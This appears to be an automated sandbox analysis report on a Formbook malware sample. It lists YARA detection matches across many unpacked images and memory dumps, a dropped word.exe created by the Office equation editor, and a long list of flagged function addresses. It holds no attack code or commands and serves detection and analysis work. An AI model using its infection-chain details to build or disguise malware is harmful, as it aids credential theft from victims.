Source: Yara match	File source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\word.exe			Jump to dropped file

Yara signature match

Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

4_2_00403225

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_0040604C		4_2_0040604C
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00404772		4_2_00404772
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00401026		5_2_00401026
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041E261		5_2_0041E261
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041EB71		5_2_0041EB71
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041E3DA		5_2_0041E3DA
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041E4B4		5_2_0041E4B4
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00409E4B		5_2_00409E4B
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00409E50		5_2_00409E50
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041EEB5		5_2_0041EEB5
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041D7DE		5_2_0041D7DE
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041E79A		5_2_0041E79A
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0099E0C6		5_2_0099E0C6
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009CD005		5_2_009CD005
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009B905A		5_2_009B905A
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A1D06D		5_2_00A1D06D
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009A3040		5_2_009A3040
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0099E2E9		5_2_0099E2E9
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A41238		5_2_00A41238
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A463BF		5_2_00A463BF
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009C63DB		5_2_009C63DB
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0099F3CF		5_2_0099F3CF
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009A2305		5_2_009A2305
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009A7353		5_2_009A7353
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009EA37B		5_2_009EA37B
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009B1489		5_2_009B1489
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009D5485		5_2_009D5485
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A2443E		5_2_00A2443E
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009DD47D		5_2_009DD47D
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A205E3		5_2_00A205E3
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009BC5F0		5_2_009BC5F0
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009A351F		5_2_009A351F
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009E6540		5_2_009E6540
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009A4680		5_2_009A4680
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009AE6C1		5_2_009AE6C1
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A42622		5_2_00A42622
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009EA634		5_2_009EA634
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009AC7BC		5_2_009AC7BC
